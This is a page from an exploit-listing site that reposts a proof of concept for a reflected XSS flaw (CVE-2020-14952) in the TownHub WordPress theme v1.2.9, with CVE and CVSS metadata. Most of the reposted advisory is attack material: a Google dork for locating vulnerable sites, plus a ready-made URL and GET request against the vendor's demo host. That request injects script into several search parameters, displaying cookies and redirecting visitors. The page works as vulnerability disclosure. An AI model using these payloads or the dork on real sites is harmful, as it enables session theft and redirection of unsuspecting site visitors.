Advertisement






TownHub - Directory & Listing WordPress Theme v1.2.9 - Unauthenticated Reflected XSS

CVE Category Price Severity
CVE-2020-14952 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-06-22
CPE
cpe:cpe:/a:townhub:directory_listing_wordpress_theme:1.2.9
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060095

Below is a copy:

TownHub - Directory & Listing WordPress Theme v1.2.9 - Unauthenticated Reflected XSS
[+] Exploit Title: TownHub - Directory & Listing WordPress Theme v1.2.9 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/townhub/
[+] Date: 2020-06-17
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: CTHthemes [ https://cththemes.com ]
[+] Software Version: 1.2.9
[+] Software Link: https://themeforest.net/item/townhub-directory-listing-wordpress-theme/25019571
[+] Tested on: Debian 10
[+] CVE: CVE-2020-14952
[+] CWE: CWE-79



### [ PoC: ]

[!] https://townhub.cththemes.com/?search_term=&location_search=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`)%3E&distance=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&nearby=&address_lat=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E&address_lng=%22%3E%3Cimg%20src=x%20onerror=alert(`PoC`);window.location=`https://twitter.com/vlad_vector`;%3E&lcats[]=195

[!] GET /?search_term=&location_search=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`)%3E&distance=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&nearby=&address_lat=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E&address_lng=%22%3E%3Cimg%20src=x%20onerror=alert(`PoC`);window.location=`https://twitter.com/vlad_vector`;%3E&lcats[]=195 HTTP/1.1
Host: townhub.cththemes.com



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.